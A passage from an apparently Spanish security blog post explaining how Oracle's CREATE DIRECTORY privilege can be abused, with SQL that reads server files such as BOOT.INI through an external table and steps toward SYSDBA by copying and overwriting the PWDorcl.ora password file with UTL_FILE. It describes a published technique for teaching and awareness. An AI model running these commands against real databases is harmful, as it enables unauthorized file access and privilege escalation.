SQL> CREATE DIRECTORY discoC AS ''c:\'';

2.- Creas una tabla con almacenamiento externo asociada al fichero que quieras descargar.

SQL> CREATE TABLE TABLE_BOOT ( DATOS VARCHAR2(4000))
ORGANIZATION EXTERNAL
(TYPE ORACLE_LOADER DEFAULT DIRECTORY DISCOC
ACCESS PARAMETERS ( RECORDS DELIMITED BY NEWLINE )
LOCATION (''BOOT.INI''));

3.- y luego basta con hacer select sobre esa tabla.

SQL> SELECT * FROM TABLE_BOOT;

Existe alguna opición más para descargar ficheros desde Oracle y los que vengáis al Asegúr@IT IV podréis ver como se hace en SQL Server 2k, SQL Server 2k5, Oracle y MySQL además de verlo automatizado con una herramienta.

Pero… Ya que bajamos… ¿por qué no subimos ficheros?

El día 10 de Octubre se presentó un paper para ser sysdba en Oracle utilizando los directorios. Bueno, los directorios y el paquete UTL_FILE en PL/SQL que permite manipular ficheros. El caso es que, alguien podría hacer los siguientes pasos:

1.- Crear un directorio en la ubicación dónde Oracle guarda la contraseña de acceso externo para sys. Hay que tener en cuenta que Oracle utiliza una autenticación a nivel de sysdba basada en un ficherito que se llama PWD[nombreinstancia].ora por defecto, para autenticaciones externas ya que si los usuarios están dentro de las tablas de la base de datos y la base de datos está apagada…. Habría poco que hacer entonces.

SQL> CREATE OR REPLACE DIRECTORY TESTPASS
AS 'F:\ORACLE\PRODUCT\10.1.0\DB_2\DATABASE';

2.- Crear un fichero de copia de seguridad con el paquete UTL_FILE en ese directorio para que se genere un fichero PWD[nombreinstancia].ora2 y el original pueda ser modificado.

SQL> BEGIN
2 utl_file.fcopy('TESTPASS', 'PWDorcl.ora', 'TESTPASS',
'PWDorcl.oraBU');
3 END;
4 /

3.- Utilizar las funciones de copia de UTL_FILE para sobre-escribir el fichero PWD[nombreinstancia].ora con una contraseña conocida.

Código SQL de sobre-escritura del archivo.

¡Y listo! ¿A qué molan los directorios en Oracle?. Puedes leer el paper completo en : CREATE ANY DIRECTORY to SYSDBA

Saludos Malignos!